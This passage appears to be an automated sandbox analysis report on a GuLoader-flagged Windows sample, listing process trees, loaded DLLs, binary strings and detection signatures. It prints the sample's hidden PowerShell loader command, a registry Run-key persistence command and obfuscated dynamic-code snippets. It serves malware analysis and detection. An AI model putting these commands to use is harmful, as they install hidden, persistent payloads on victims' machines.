Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "set /A 1^^0"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Local\Temp\Untapestried.exe "C:\Users\user\AppData\Local\Temp\Untapestried.exe"
Source: C:\Users\user\AppData\Local\Temp\Untapestried.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Lgplante" /t REG_EXPAND_SZ /d "%Divergente% -windowstyle minimized $Millibar=(Get-ItemProperty -Path 'HKCU:\Ciconiform\').Syskerne;%Divergente% ($Millibar)"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Lgplante" /t REG_EXPAND_SZ /d "%Divergente% -windowstyle minimized $Millibar=(Get-ItemProperty -Path 'HKCU:\Ciconiform\').Syskerne;%Divergente% ($Millibar)"
Source: C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\SysWOW64\cmd.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\160420241245287.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Titelbladenes=Get-Content 'C:\Users\user\AppData\Roaming\opbevaringssteder\Shrinkageproof\Ursa\Soklernes\Randrusianeren.Unf';$Ryslerne=$Titelbladenes.SubString(75194,3);.$Ryslerne($Titelbladenes)" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "set /A 1^^0" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Local\Temp\Untapestried.exe "C:\Users\user\AppData\Local\Temp\Untapestried.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Untapestried.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Lgplante" /t REG_EXPAND_SZ /d "%Divergente% -windowstyle minimized $Millibar=(Get-ItemProperty -Path 'HKCU:\Ciconiform\').Syskerne;%Divergente% ($Millibar)" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Lgplante" /t REG_EXPAND_SZ /d "%Divergente% -windowstyle minimized $Millibar=(Get-ItemProperty -Path 'HKCU:\Ciconiform\').Syskerne;%Divergente% ($Millibar)" Jump to behavior
Source: C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\SysWOW64\cmd.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe" Jump to behavior
Source: C:\Users\user\Desktop\160420241245287.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\160420241245287.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\160420241245287.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\160420241245287.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\160420241245287.exe Section loaded: shfolder.dll Jump to behavior
Source: C:\Users\user\Desktop\160420241245287.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\160420241245287.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\160420241245287.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\160420241245287.exe Section loaded: riched20.dll Jump to behavior
Source: C:\Users\user\Desktop\160420241245287.exe Section loaded: usp10.dll Jump to behavior
Source: C:\Users\user\Desktop\160420241245287.exe Section loaded: msls31.dll Jump to behavior
Source: C:\Users\user\Desktop\160420241245287.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\Desktop\160420241245287.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\Desktop\160420241245287.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\160420241245287.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\160420241245287.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\160420241245287.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\160420241245287.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\160420241245287.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Untapestried.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Untapestried.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Untapestried.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Untapestried.exe Section loaded: powrprof.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Untapestried.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Untapestried.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Untapestried.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Untapestried.exe Section loaded: umpdc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Untapestried.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Untapestried.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Untapestried.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Untapestried.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Untapestried.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Untapestried.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Untapestried.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Untapestried.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Untapestried.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Untapestried.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Untapestried.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Untapestried.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Untapestried.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Untapestried.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Untapestried.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Untapestried.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Untapestried.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Untapestried.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Untapestried.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Untapestried.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Untapestried.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Untapestried.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Untapestried.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: ieframe.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: mlang.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: winsqlite3.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: vaultcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\160420241245287.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\ Jump to behavior
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5~ source: powershell.exe, 00000001.00000002.2060432087.000000000767E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mshtml.pdb source: Untapestried.exe, 00000007.00000001.1996319048.0000000000649000.00000008.00000001.01000000.00000009.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: bvvgQqxLmFZr.exe, 0000000B.00000002.2887014647.0000000000A4E000.00000002.00000001.01000000.0000000A.sdmp, bvvgQqxLmFZr.exe, 0000000D.00000002.2886634622.0000000000A4E000.00000002.00000001.01000000.0000000A.sdmp
Source: Binary string: wntdll.pdbUGP source: Untapestried.exe, 00000007.00000003.2059573045.0000000020323000.00000004.00000020.00020000.00000000.sdmp, Untapestried.exe, 00000007.00000002.2169142405.00000000204D0000.00000040.00001000.00020000.00000000.sdmp, Untapestried.exe, 00000007.00000002.2169142405.000000002066E000.00000040.00001000.00020000.00000000.sdmp, Untapestried.exe, 00000007.00000003.2057819676.0000000020179000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000C.00000003.2155560339.0000000002D7F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000C.00000003.2157021649.0000000002F22000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: cmd.pdbUGP source: Untapestried.exe, 00000007.00000003.2114834443.0000000004778000.00000004.00000020.00020000.00000000.sdmp, Untapestried.exe, 00000007.00000003.2155304124.00000000201F1000.00000004.00000020.00020000.00000000.sdmp, bvvgQqxLmFZr.exe, 0000000B.00000003.2085185213.0000000000E0B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: Untapestried.exe, Untapestried.exe, 00000007.00000003.2059573045.0000000020323000.00000004.00000020.00020000.00000000.sdmp, Untapestried.exe, 00000007.00000002.2169142405.00000000204D0000.00000040.00001000.00020000.00000000.sdmp, Untapestried.exe, 00000007.00000002.2169142405.000000002066E000.00000040.00001000.00020000.00000000.sdmp, Untapestried.exe, 00000007.00000003.2057819676.0000000020179000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, cmd.exe, 0000000C.00000003.2155560339.0000000002D7F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000C.00000003.2157021649.0000000002F22000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: mshtml.pdbUGP source: Untapestried.exe, 00000007.00000001.1996319048.0000000000649000.00000008.00000001.01000000.00000009.sdmp
Source: Binary string: cmd.pdb source: Untapestried.exe, 00000007.00000003.2114834443.0000000004778000.00000004.00000020.00020000.00000000.sdmp, Untapestried.exe, 00000007.00000003.2155304124.00000000201F1000.00000004.00000020.00020000.00000000.sdmp, bvvgQqxLmFZr.exe, 0000000B.00000003.2085185213.0000000000E0B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdba source: powershell.exe, 00000001.00000002.2060432087.0000000007705000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation
barindex
Yara detected GuLoader
Source: Yara match File source: 00000001.00000002.2067336932.000000000BC43000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Found suspicious powershell code related to unpacking or dynamic code loading
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: GetDelegateForFunctionPointer((Harder171 $Dodonean $Manchette192), (Aarskarakter @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Replikskiftet = [AppDomain]::CurrentDomain.GetAssemblies(
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Winiest)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Editioners, $false).DefineType($Breastwood, $Ramo
Obfuscated command line found
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "set /A 1^^0"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "set /A 1^^0" Jump to behavior
Suspicious powershell command line found
Source: C:\Users\user\Desktop\160420241245287.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Titelbladenes=Get-Content 'C:\Users\user\AppData\Roaming\opbevaringssteder\Shrinkageproof\Ursa\Soklernes\Randrusianeren.Unf';$Ryslerne=$Titelbladenes.SubString(75194,3);.$Ryslerne($Titelbladenes)"
Source: C:\Users\user\Desktop\160420241245287.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Titelbladenes=Get-Content 'C:\Users\user\AppData\Roaming\opbevaringssteder\Shrinkageproof\Ursa\Soklernes\Randrusianeren.Unf';$Ryslerne=$Titelbladenes.SubString(75194,3);.$Ryslerne($Titelbladenes)" Jump to behavior
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\160420241245287.exe Code function: 0_2_00406254 GetModuleHandleA,LoadLibraryA,GetProcAddress, 0_2_00406254
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_04BD1187 push eax; retf 0070h 1_2_04BD1192
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_04BD1177 push eax; retf 0070h 1_2_04BD1182
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_04BD116D push eax; retf 0070h 1_2_04BD1172
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_030D225F pushad ; ret 12_2_030D27F9
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_030D27FA pushad ; ret 12_2_030D27F9
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031009AD push ecx; mov dword ptr [esp], ecx 12_2_031009B6
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_030D283D push eax; iretd 12_2_030D2858
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_030D1368 push eax; iretd 12_2_030D1369
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_02838208 push ds; retf 12_2_0283820A
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_02850268 push edi; iretd 12_2_02850278
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_02850270 push edi; iretd 12_2_02850278
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0284039F push ss; ret 12_2_028403C4
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_028443C0 push edi; retf 12_2_028443CC
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_028403D1 push E16F236Ah; retn 0031h 12_2_028403D6
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_02850046 push FFFFFF8Ch; iretd 12_2_02850077
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_028421B0 push esi; retf 12_2_028421BB
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0285067E push ecx; ret 12_2_028506AE
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0284CBAE push eax; retf 12_2_0284CBB1
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_02844FC8 pushfd ; retf 12_2_02844FDD
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0284B681 push ebp; ret 12_2_0284B68C
Drops PE files
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\Untapestried.exe Jump to dropped file
Source: C:\Users\user\Desktop\160420241245287.exe File created: C:\Users\user\AppData\Local\Temp\nsf6B4D.tmp\nsExec.dll Jump to dropped file
Source: C:\Windows\SysWOW64\reg.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Lgplante Jump to behavior
Source: C:\Windows\SysWOW64\reg.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Lgplante Jump to behavior
Source: C:\Users\user\Desktop\160420241245287.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
